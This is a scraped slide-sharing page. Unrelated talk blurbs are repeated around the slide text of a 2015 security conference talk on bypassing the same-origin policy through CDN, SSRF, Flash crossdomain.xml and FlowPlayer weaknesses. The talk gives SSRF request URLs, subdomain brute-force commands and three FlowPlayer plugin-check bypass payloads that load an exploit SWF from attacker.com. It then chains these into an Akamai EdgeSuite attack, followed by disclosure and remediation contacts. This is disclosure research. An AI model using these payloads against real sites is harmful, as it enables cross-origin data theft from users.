This document summarizes vulnerabilities related to content delivery networks (CDNs) and server-side request forgery (SSRF). It discusses how CDNs are used to deliver content for many popular websites, and the security risks if a vulnerability is found in a CDN provider. It also explains how SSRF allows attackers to perform requests from a web server to internal systems and networks. Tools for DNS reconnaissance and exploiting SSRF are presented. The document further explores how Flash can be used to bypass the same-origin policy by loading content from other domains using vulnerabilities in plugins like FlowPlayer.
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
WATCH JASON'S TALK LIVE, 8/14 @ 11AM PDT - Register Here: http://bgcd.co/DEFCON23-haddix
Jason Haddix explores successful tactics and tools used by himself and the best bug hunters. Practical methodologies, tools and tips that make you better at hacking websites and mobile apps to claim those bounties.
Follow Jason on Twitter: http://twitter.com/jhaddix
Follow Bugcrowd on Twitter: http://twitter.com/bugcrowd
Check out the latest bug bounties on Bugcrowd: https://bugcrowd.com/programs
From my November 3, 2011 talk at MNPHP. Regular expressions are a powerful tool available in nearly every programming language or platform, including PHP. I go over the history of POSIX vs. PCRE, examples in PHP, and optimizations on how to write faster expressions.
ECMAScript is the name of the international standard that defines JavaScript. ES6 → ECMAScript 2015. Latest ECMAScript version is ES7 which is ECMAScript 2016.
Basically it is a superset of es5
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
WATCH JASON'S TALK LIVE, 8/14 @ 11AM PDT - Register Here: http://bgcd.co/DEFCON23-haddix
Jason Haddix explores successful tactics and tools used by himself and the best bug hunters. Practical methodologies, tools and tips that make you better at hacking websites and mobile apps to claim those bounties.
Follow Jason on Twitter: http://twitter.com/jhaddix
Follow Bugcrowd on Twitter: http://twitter.com/bugcrowd
Check out the latest bug bounties on Bugcrowd: https://bugcrowd.com/programs
From my November 3, 2011 talk at MNPHP. Regular expressions are a powerful tool available in nearly every programming language or platform, including PHP. I go over the history of POSIX vs. PCRE, examples in PHP, and optimizations on how to write faster expressions.
ECMAScript is the name of the international standard that defines JavaScript. ES6 → ECMAScript 2015. Latest ECMAScript version is ES7 which is ECMAScript 2016.
Basically it is a superset of es5
If you are using jQuery, you need to understand the Document Object Model and how it accounts for all the elements inside any HTML document or Web page.
Asynchronous JavaScript Programming with Callbacks & PromisesHùng Nguyễn Huy
This presentation is about JavaScript Promise. Topics covered in this session are:
1. Asynchronous processing in JavaScript
2. Callbacks and Callback hell
3. Promises arrive in JavaScript!
4. Constructing a Promise
5. Promise states
6. Promises chaining and transformation
7. Error handling
8. Promise.all() and Promise.race()
JavaScript Events:
HTML events are "things" that happen to HTML elements. When JavaScript is used in HTML pages, JavaScript can "react" on these events.
What can JavaScript Do?
Event handlers can be used to handle, and verify, user input, user actions, and browser actions:
Things that should be done every time a page loads
Things that should be done when the page is closed
Action that should be performed when a user clicks a button
Content that should be verified when a user inputs data
If you are using jQuery, you need to understand the Document Object Model and how it accounts for all the elements inside any HTML document or Web page.
Asynchronous JavaScript Programming with Callbacks & PromisesHùng Nguyễn Huy
This presentation is about JavaScript Promise. Topics covered in this session are:
1. Asynchronous processing in JavaScript
2. Callbacks and Callback hell
3. Promises arrive in JavaScript!
4. Constructing a Promise
5. Promise states
6. Promises chaining and transformation
7. Error handling
8. Promise.all() and Promise.race()
JavaScript Events:
HTML events are "things" that happen to HTML elements. When JavaScript is used in HTML pages, JavaScript can "react" on these events.
What can JavaScript Do?
Event handlers can be used to handle, and verify, user input, user actions, and browser actions:
Things that should be done every time a page loads
Things that should be done when the page is closed
Action that should be performed when a user clicks a button
Content that should be verified when a user inputs data
Deep Dive on Accelerating Content, APIs, and Applications with Amazon CloudFr...Amazon Web Services
Learn more about AWS Lambda@Edge (https://aws.amazon.com/lambda/edge/) and Amazon CloudFront (https://aws.amazon.com/cloudfront/).
Attend this session to dive deeper into AWS content delivery service and Amazon CloudFront. Learn how you can use CloudFront to accelerate the delivery of your APIs or applications, including content that cannot be cached, to global clients.
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...EC-Council
DNS: STRATEGIES FOR REDUCING DATA LEAKAGE & PROTECTING ONLINE PRIVACY
DNS is the foundational protocol used to directly nearly all Internet traffic making the collection and analysis of DNS traffic highly valuable. This talk will examine ways in which you can effectively limit the disclosure of your online habits through securing the way your local DNS resolvers work.
The NGPC approved the Name Collision Occurrence Management Framework on 30 July 2014 that puts new requirements on registries to mitigate name collision issues.
This session explains what registries are expected to implement, and discuss feedback from those in the community on their experiences so far. It also aims to clarify any points of confusion – such as how RPMs can be treated in relation to this new Framework and how both sets of requirements can be adhered to simultaneously.
Subdomain hijacking presents significant security risks to organizations. Everything from credential theft to phishing can be made possible with a few keystrokes and click of a mouse. This talk focuses on how these risks materialize within an AWS cloud environment, how to enumerate their existence, and options to quickly mitigate them.
CONFidence 2018: Detecting Phishing from pDNS (Irena Damsky)PROIDEA
Passive DNS (pDNS) have been utilized by threat researchers for several years and allow us to gather information on domain usage worldwide. Since data fidelity varies depending upon the scope, timeline, and vantage point of sensor networks, pDNS visibility provides a multitude of different and exciting results for analysts to review. In this presentation we will quickly recap DNS and pDNS, review different approaches to detecting phishing using pDNS and focus on demonstrating different heuristics and operational procedures that can help increase actual detection while minimizing false positives.
Training Webinar: Enterprise application performance with server push technol...OutSystems
1st Session - WebSockets, a Server Push Technology:
- Differences between Pull and Push technologies
- What are WebSockets
- A bit of History behind WebSockets
- When to use WebSockets
- How to integrate WebSockets with OutSystems
- Considerations when using WebSockets
Free Online training: https://www.outsystems.com/learn/courses/
Follow us on Twitter http://www.twitter.com/OutSystemsDev
Like us on Facebook http://www.Facebook.com/OutSystemsDev
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
This talk is specifically for NON-SharePoint infrastructure administrators (or for new ones still figuring things out)! Instead it’s for the rest of the SharePoint team – come learn about the basic building blocks of SharePoint infrastructure – things like DNS, load balancing, AD, high availability and disaster recovery, backup options, database options, and some of the core components of Windows in an understandable way so you can speak the lingo and seem really smart!
Zvonimir Mavretić
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...JeyaPerumal1
A cellular network, frequently referred to as a mobile network, is a type of communication system that enables wireless communication between mobile devices. The final stage of connectivity is achieved by segmenting the comprehensive service area into several compact zones, each called a cell.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
1. Bypass Surgery
Abusing Content Delivery
Networks With Server Side Request
Forgery (SSRF), Flash, and DNS
BY MIKE BROOKS AND MATTHEW BRYANT
August 6, 2015
2. 22
Security Consultant for Bishop Fox
Maintainer of The Hacker Blog: https://thehackerblog.com
@IAmMandatory
Signal Fingerprint
05 d4 6b db 51 31 9b 43 b6 6b c6 96 91 fb 3c 1e 60 3c 93
6b 4e 1f 55 8e 54 9a 93 e0 a4 c3 ad 99 34
HAS BEEN KNOWN TO HACK THINGS
Matthew Bryant (mandatory)
4. 44
• Almost all modern web applications depend on
third-party services to operate.
• These third parties are implicitly trusted and work
invisibly in the background.
WORKING BUT TANGLED
Interconnected Services
5. 55
• The web consists of many content delivery
networks (CDNs) that deliver content via large
distributed networks.
• When you visit your favorite sites, you
unknowingly trust these services.
ONE PAGE SPAWNING MANY REQUESTS
Content Delivery Networks
6. 66
ONE PAGE SPAWNING MANY REQUESTS
How People Think the Web Works…
foxnews.com homepage?
9. 99
• Many sites on the Internet trust a short list of CDNs
to serve their content.
• What happens when a vulnerability is found in a
CDN provider?
• The impact is severe and far reaching.
WHAT COULD GO WRONG
Many Sites Trusting a Few CDNs
13. 1313
TOOLS
DNS meta-query spider
• https://github.com/TheRook/subbrute
Search though a mass-reverse lookup DB
• https://dnsdumpster.com/
Brute-force forward-lookups
• https://github.com/darkoperator/dnsrecon
Profiling With DNS
14. 1414
SubBrute 2.0
Source: https://github.com/TheRook/subbrute
• Through (~3 hours) – Authoritative NS used by default
./subbrute.py google.com –p –s names_large
• Very Fast (~8 minutes) – Using Open Resolvers
./subbrute.py google.com –p –r resolvers.txt
15. 1515
QUERIES ABOUT QUERIES
DNS Meta Queries
AXFR - Transfers entire zone file from the master
name server to “secondary name servers”
ANY - Returns all records of all types known to the
name server. If the name server does not have any
information on the name, the request will be
forwarded on.
32. 3232
TOOLS
Netcat for the 21st century
• https://nmap.org/ncat/
HTTP Request and Response Service
• http://httpbin.org/
Burp Collaborator
• http://blog.portswigger.net/2015/04/introducing-
burp-collaborator.html
SSRF tools
33. 3333
Access to the Web Server’s localhost
http://legitbank.com/proxy.php?csurl=http://localhost:631
38. 3838
PATHS TO EXPLOITATION
• Can I access a protected resource?
• XXE DTD system to make HTTP Requests?
• Internal IP Address or Hosts?
• “Virtual Private Cloud,” S3, MongoDB HTTP
interface?
• Can I connect to a host I control?
• Can I load arbitrary content such as a SWF on the
domain?
SSRF Questions
40. 4040
Crossdomain.xml Proof of Concept Tool
• https://thehackerblog.com/crossdomain/
FlashHTTPRequest
• https://github.com/mandatoryprogrammer/FlashHTTPReque
st
JPEXS
• https://www.free-decompiler.com/flash/
SEARCHDIGGITY
• http://www.bishopfox.com/resources/tools/google-hacking-
diggity/attack-tools/
MEN HAVE BECOME TOOLS OF THEIR TOOLS
Tools
42. 4242
• An origin is a combination of port, scheme, and
domain.
• Origins separate sites from accessing each
other’s data due to the Same Origin Policy (SOP).
• For example, a script executing in the context of
the http://example.com origin could not read data
from http://thirdparty.com because the origins do
not match.
CROSSING THE ORIGIN BOUNDARY
What’s an origin?
43. 4343
JavaScript
• Remote JavaScript
includes execute in
the context of the
including site’s origin.
Flash
• Remote includes
execute in the
context of the hosting
site’s origin.
CROSSING THE ORIGIN BOUNDARY
Differences between JavaScript and Flash
48. 4848
CROSSING THE ORIGIN BOUNDARY
Remote Flash Inclusion Example
http://thirdparty.com/secrets.txt
Secrets on thirdparty.com!
49. 4949
• Before Flash preforms a cross-origin request, the
target site’s crossdomain.xml file is checked.
• This file permits third-party sites to perform
authenticated requests via allow-access-from
domain tags.
• Wildcard usage is allowed and is commonplace.
CROSSING THE ORIGIN BOUNDARY
Flash Cross-Domain Policies
50. 5050
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
51. 5151
75%
25%
USES DOESN'T USE
*NOT INCLUDING SITES WITH JUST A WILDCARD ENTRY
Usage of domain wildcards (*.domain.com)?
*Taken from a
survey of Alexa
top 10,000 sites
52. 5252
• Enumerate all subdomains of a domain name:
• ./subbrute.py thirdparty.com
• ./subbrute.py legitbank.com
• An arbitrary SWF upload or vulnerable SWF on any
domain will compromise the security of
legitbank.com.
CROSSING THE ORIGIN BOUNDARY
Enumerating Subdomains With Subbrute
54. 5454
• FlowPlayer is a Flash application that plays videos
and allows the loading of arbitrary Flash plugins.
DON’T HATE THE PLAYER
FlowPlayer
55. 5555
• Problematically, FlowPlayer versions below 3.2.16
allowed the loading of plugins from arbitrary
domains.
• This means an attacker can hijack the functionality
of FlowPlayer by loading arbitrary plugins into the
player.
DON’T HATE THE PLAYER
FlowPlayer
56. 5656
DON’T HATE THE PLAYER
FlowPlayer
http://legitbank.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: 'http://thirdparty.com/plugin.swf',
}
}
});
57. 5757
• With the release of FlowPlayer 3.2.18 new code
was introduced to prevent loading of arbitrary
plugins.
• This code parses the plugin URL to check if it’s
trusted before loading it.
• However, we found three bypasses by auditing
the plugin checking code.
DON’T HATE THE PLAYER
Multiple FlowPlayer Bypasses
59. 5959
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Check
public static function isLocal(url:String):Boolean {
trace("localDomain? " + url);
if (url.indexOf("http://localhost") == 0) return true;
if (url.indexOf("http://localhost:") == 0) return true;
if (url.indexOf("file://") == 0) return true;
if (url.indexOf("http://127.0.0.1") == 0) return true;
if (url.indexOf("http://") == 0) return false;
if (url.indexOf("/") == 0) return true;
return false;
}
60. 6060
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Check
public static function isLocal(url:String):Boolean {
trace("localDomain? " + url);
if (url.indexOf("http://localhost") == 0) return true;
if (url.indexOf("http://localhost:") == 0) return true;
if (url.indexOf("file://") == 0) return true;
if (url.indexOf("http://127.0.0.1") == 0) return true;
if (url.indexOf("http://") == 0) return false;
if (url.indexOf("/") == 0) return true;
return false;
}
61. 6161
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: ’//attacker.com/exploit.swf',
}
}
});
62. 6262
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Check
public static function getDomain(url:String):String {
var schemeEnd:int = getSchemeEnd(url);
var domain:String = url.substr(schemeEnd);
var endPos:int = getDomainEnd(domain);
return domain.substr(0, endPos).toLowerCase();
}
internal static function getSchemeEnd(url:String):int {
var pos:int = url.indexOf("///");
if (pos >= 0) return pos + 3;
pos = url.indexOf("//");
if (pos >= 0) return pos + 2;
return 0;
}
63. 6363
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Check
public static function getDomain(url:String):String {
var schemeEnd:int = getSchemeEnd(url);
var domain:String = url.substr(schemeEnd);
var endPos:int = getDomainEnd(domain);
return domain.substr(0, endPos).toLowerCase();
}
internal static function getSchemeEnd(url:String):int {
var pos:int = url.indexOf("///");
if (pos >= 0) return pos + 3;
pos = url.indexOf("//");
if (pos >= 0) return pos + 2;
return 0;
}
64. 6464
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url:
’http://attacker.com///legitbank.com/../flowplayer/plugin.
swf',
}
}
});
65. 6565
DON’T HATE THE PLAYER
FlowPlayer Bypass #3 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url:
’http://legitbank.com/openredirect.php?url=http://attacker.com/flowplayer/plu
gin.swf',
}
}
});
66. 6666
There are probably many more, but three is a cool
number.
DON’T HATE THE PLAYER
More bypasses…
77. 7777
• EdgeSuite.net is used in Akamai’s Content Delivery Network
(CDN).
• Part of the FreeFlow service, Akamai’s legacy content
delivery network.
• The setup process for FreeFlow involves pointing DNS
records to Akamai’s network.
• Instead of hitting your site directly the Akamai service acts
as a caching and distribution service.
SOP BYPASS AT SCALE
Akamai EdgeSuite
78. 7878
SOP BYPASS AT SCALE
Akamai EdgeSuite - DNS
akamai.example.com
x.example.com.edgesuite.net.
a1337.g.akamai.net.
184.25.56.98
79. 7979
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
80. 8080
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
81. 8181
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
82. 8282
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
84. 8484
• Akamai Resource Locator
• Special URL use to host files on the Akamai network.
• A deprecated service that Akamai used to do when setting
up clients for their CDN solution.
• Despite being deprecated, many endpoints still have it
enabled.
SOP BYPASS AT SCALE
ARLv1
85. 8585
Say you want to host this file on Akamai:
http://example.edgesuite.net/flow/swf/example.
swf
SOP BYPASS AT SCALE
ARLv1
87. 8787
• This process is known as Akamaization of a URL.
• Akamai’s network works by pulling the file off
your server and hosting it on the CDN.
SOP BYPASS AT SCALE
ARLv1
88. 8888
• If you point akamai.example.com to Akamai’s
EdgeSuite service, we can host arbitrary files on
your server.
• However, you can only use the site to retrieve
files from a specific list of sites.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
90. 9090
• We took to enumerating what sites could be
proxied.
./subbrute.py edgesuite.net
• After some searching we found a site on the
whitelist.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
93. 9393
• Not only do they host FlowPlayer, they host
FlowPlayer 3.2.16, which allows the loading of any
arbitrary Flash plugins.
• So, putting it together - we can now host an
intentionally vulnerable version of FlowPlayer on
any site mapped to EdgeSuite, and then hijack it.
SOP BYPASS AT SCALE
ARLv1 & EdgeSuite
100. 100100
THE FALLOUT
Full Exploit Flow
HIJACKED FLOWPLAYER
REQUESTS PAGE FROM
LEGITBANK.COM
DUE TO A *.LEGITBANK.COM
ENTRY IN CROSSDOMAIN.XML
THIS IS ALLOWED.
mediapm.edgesuite.net
akamai.legitbank.com
attacker.com
legitbank.com
102. 102102
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
103. 103103
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
IF ANY SUBDOMAIN IS
MAPPED TO EDGESUITE THE
SITE IS COMPROMISED
IF ANY SUBDOMAIN IS
MAPPED TO EDGESUITE THE
SITE IS COMPROMISED
104. 104104
• A site doesn’t even have to use Akamai
EdgeSuite to be vulnerable.
• They just have to trust them via crossdomain.xml.
• Due to Flash’s crossdomain.xml policies being so
commonly misconfigured, we can increase our
impact to affect many more sites.
SOP BYPASS AT SCALE
Expanding Attack Surface With Flash
108. 108108
• HTTP Content Security Policy (CSP) will not
prevent this type of attack.
• Since we are loading their SWF into our own
page, the CSP does not apply.
• Additionally, we can use vulnerable SWFs hosted
on Content Delivery Networks (CDNs) to exploit
site’s with CDNs in their CSP whitelists.
CROSSING THE ORIGIN BOUNDARY
Bypassing HTTP Content Security Policy
109. 109109
• Akamai has been super supportive to us
throughout this disclosure process.
• In order to address this vulnerability, they have
provided us with instructions on remediation if
you are vulnerable.
HOW DO I FIX THIS?
Remediation
110. 110110
• You may already be patched!
• If you are an Akamai customer you need to call
Akamai’s support line at 1-617-444-4699 or email
them at ccare@akamai.com.
• Public inquires can be directed to Rob Morton at
1-617-444-3641 or rmorton@akamai.com.
HOW DO I FIX THIS?
How Do I Remediate?
111. 111111
• If you are a security researcher with a
vulnerability in Akamai you can reach them at
security@akamai.com.
• They have a PGP key available on their website
that you can use for more sensitive
communications.
• Akamai is hiring folks at:
https://www.akamai.com/us/en/about/careers/ind
ex.jsp.
HOW DO I FIX THIS?
Future Security Research